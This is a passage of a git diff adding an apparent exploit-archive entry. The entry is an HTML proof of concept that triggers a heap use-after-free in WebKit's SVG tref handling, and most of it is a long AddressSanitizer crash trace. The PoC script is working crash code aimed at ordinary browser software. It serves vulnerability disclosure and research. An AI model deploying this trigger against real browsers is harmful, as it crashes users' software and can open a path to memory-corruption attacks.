+=>0x1c2600020710: fd fd fd fd[fd]fd fd fd fa fa fa fa fa fa fa fa
+  0x1c2600020720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2600020730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2600020740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2600020750: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c2600020760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==26534==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=187249
+Apple product security report ID: 694275122
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45485.html b/exploits/multiple/dos/45485.html
new file mode 100644
index 000000000..3685f9cf6
--- /dev/null
+++ b/exploits/multiple/dos/45485.html
@@ -0,0 +1,214 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233006 on OSX.
+
+PoC:
+
+=================================================================
+-->
+
+<script>
+function freememory() {
+ for(var i=0;i<100;i++) {
+   a = new Uint8Array(1024*1024);
+ }
+}
+function eventhandler2() {
+  svgvar00004.setAttribute("y", "0 1 100");
+  document.execCommand("justifyCenter", false);
+  svgvar00008.setAttribute("visibility", "hidden");
+  freememory()
+  document.createElement("q");
+  svgvar00007.replaceWith(svgvar00008);
+}
+function eventhandler4() {
+  svgvar00020.addEventListener("DOMNodeInserted", eventhandler2);
+  document.execCommand("hiliteColor", false, "red");
+}
+</script>
+<svg id="svgvar00001">
+<switch id="svgvar00004">
+<tref id="svgvar00007" xlink:href="#svgvar00008" />
+<tref id="svgvar00008">
+<tspan id="svgvar00020" />
+<use id="svgvar00029" xlink:href="#svgvar00001" onload="eventhandler4()" />
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==69919==ERROR: AddressSanitizer: heap-use-after-free on address 0x615000090e14 at pc 0x00011551a61a bp 0x7ffee91562a0 sp 0x7ffee9156298
+READ of size 4 at 0x615000090e14 thread T0
+==69919==WARNING: invalid path to external symbolizer!
+==69919==WARNING: Failed to use and restart external symbolizer!
+    #0 0x11551a619 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619)
+    #1 0x1179639ed in WebCore::Element::shadowRoot() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25019ed)
+    #2 0x11796723b in WebCore::Element::userAgentShadowRoot() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x250523b)
+    #3 0x1191bf05b in WebCore::SVGTRefElement::updateReferencedText(WebCore::Element*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3d5d05b)
+    #4 0x11799b9ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
+    #5 0x117996fbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
+    #6 0x11797a590 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2518590)
+    #7 0x11798e65b in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c65b)
+    #8 0x11798e05e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c05e)
+    #9 0x117a3757f in WebCore::ScopedEventQueue::dispatchAllEvents() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25d557f)
+    #10 0x1178d1a4f in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x246fa4f)
+    #11 0x115cb03b2 in WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x84e3b2)
+    #12 0x115c8d3d7 in long long WebCore::IDLOperation<WebCore::JSDocument>::call<&(WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82b3d7)
+    #13 0x4954076c176  (<unknown module>)
+    #14 0x10e1a7d08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #15 0x10e1a7d08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #16 0x10e1a133a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
+    #17 0x10ff10964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
+    #18 0x1104e25b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
+    #19 0x1104e274b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
+    #20 0x1104e2af1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
+    #21 0x11730e6b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
+    #22 0x11735cb9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
+    #23 0x11799b9ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
+    #24 0x117996fbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
+    #25 0x11797a590 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2518590)
+    #26 0x11798e65b in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c65b)
+    #27 0x11798e05e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c05e)
+    #28 0x1190a4350 in WebCore::SVGElement::sendSVGLoadEventIfPossible(bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c42350)
+    #29 0x1190ac55a in WebCore::SVGElement::finishParsingChildren() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c4a55a)
+    #30 0x1192038cd in WebCore::SVGUseElement::finishParsingChildren() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3da18cd)
+    #31 0x117ef8227 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a96227)
+    #32 0x117f015cc in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f5cc)
+    #33 0x117f0115a in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f15a)
+    #34 0x117f00364 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9e364)
+    #35 0x117f01ed7 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9fed7)
+    #36 0x11789ac2e in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2438c2e)
+    #37 0x118190ab3 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2eab3)
+    #38 0x11815a1e9 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf81e9)
+    #39 0x11829c0c7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e3a0c7)
+    #40 0x118298b4e in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e36b4e)
+    #41 0x11823018e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce18e)
+    #42 0x1078af87b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
+    #43 0x1078b3e06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
+    #44 0x1078b30fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
+    #45 0x106e94ea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
+    #46 0x106c07b7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
+    #47 0x106c0901e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)
+    #48 0x10e1253c7 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8f3c7)
+    #49 0x10e125e46 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fe46)
+    #50 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #51 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+    #52 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
+    #53 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
+    #54 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #55 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #56 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #57 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #58 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #59 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #60 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #61 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #62 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #63 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #64 0x106aa54c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
+    #65 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x615000090e14 is located 20 bytes inside of 496-byte region [0x615000090e00,0x615000090ff0)
+freed by thread T0 here:
+    #0 0x10ac59fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x10e1988e1 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1028e1)
+    #2 0x1191ce26b in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<496u>, WebCore::SVGTRefElement>(bmalloc::api::IsoHeap<WebCore::SVGTRefElement>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3d6c26b)
+    #3 0x1106695a5 in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d35a5)
+    #4 0x11066965a in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d365a)
+    #5 0x110666c8b in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d0c8b)
+    #6 0x11066058a in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25ca58a)
+    #7 0x11061612e in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x258012e)
+    #8 0x110615d37 in JSC::JSDestructibleObjectHeapCellType::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x257fd37)
+    #9 0x10fd81df9 in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cebdf9)
+    #10 0x10fd77ada in JSC::LocalAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1ada)
+    #11 0x10fd77796 in JSC::LocalAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1796)
+    #12 0x10fd771f0 in JSC::LocalAllocator::allocateSlowCase(JSC::GCDeferralContext*, JSC::AllocationFailureMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce11f0)
+    #13 0x115ef79e6 in void* JSC::allocateCell<WebCore::JSHTMLQuoteElement>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa959e6)
+    #14 0x115ef7259 in WebCore::JSHTMLQuoteElement::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLQuoteElement, WTF::DumbPtrTraits<WebCore::HTMLQuoteElement> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa95259)
+    #15 0x115ef719b in std::__1::enable_if<std::is_same<WebCore::HTMLQuoteElement, WebCore::HTMLQuoteElement>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLQuoteElement>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLQuoteElement, WebCore::HTMLQuoteElement>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLQuoteElement, WTF::DumbPtrTraits<WebCore::HTMLQuoteElement> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa9519b)
+    #16 0x115ef70ee in std::__1::enable_if<!(std::is_same<WebCore::HTMLQuoteElement, WebCore::HTMLElement>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLQuoteElement>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLQuoteElement, WebCore::HTMLElement>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLElement, WTF::DumbPtrTraits<WebCore::HTMLElement> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa950ee)
+    #17 0x115eefcbe in WebCore::createJSHTMLWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLElement, WTF::DumbPtrTraits<WebCore::HTMLElement> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa8dcbe)
+    #18 0x11735b714 in WebCore::createNewElementWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Element, WTF::DumbPtrTraits<WebCore::Element> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ef9714)
+    #19 0x11735b925 in WebCore::toJSNewlyCreated(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Element, WTF::DumbPtrTraits<WebCore::Element> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ef9925)
+    #20 0x115ca7cb2 in std::__1::enable_if<IsExceptionOr<WebCore::ExceptionOr<WTF::Ref<WebCore::Element, WTF::DumbPtrTraits<WebCore::Element> > > >::value, JSC::JSValue>::type WebCore::toJSNewlyCreated<WebCore::IDLInterface<WebCore::Element>, WebCore::ExceptionOr<WTF::Ref<WebCore::Element, WTF::DumbPtrTraits<WebCore::Element> > > >(JSC::ExecState&, WebCore::JSDOMGlobalObject&, JSC::ThrowScope&, WebCore::ExceptionOr<WTF::Ref<WebCore::Element, WTF::DumbPtrTraits<WebCore::Element> > >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x845cb2)
+    #21 0x115ca7a25 in WebCore::jsDocumentPrototypeFunctionCreateElementBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x845a25)
+    #22 0x115c8a897 in long long WebCore::IDLOperation<WebCore::JSDocument>::call<&(WebCore::jsDocumentPrototypeFunctionCreateElementBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x828897)
+    #23 0x4954076c176  (<unknown module>)
+    #24 0x10e1a7cad in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111cad)
+    #25 0x10e1a133a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
+    #26 0x10ff10964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
+    #27 0x1104e25b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
+    #28 0x1104e274b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
+    #29 0x1104e2af1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
+
+previously allocated by thread T0 here:
+    #0 0x10ac59a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x10e184a84 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeea84)
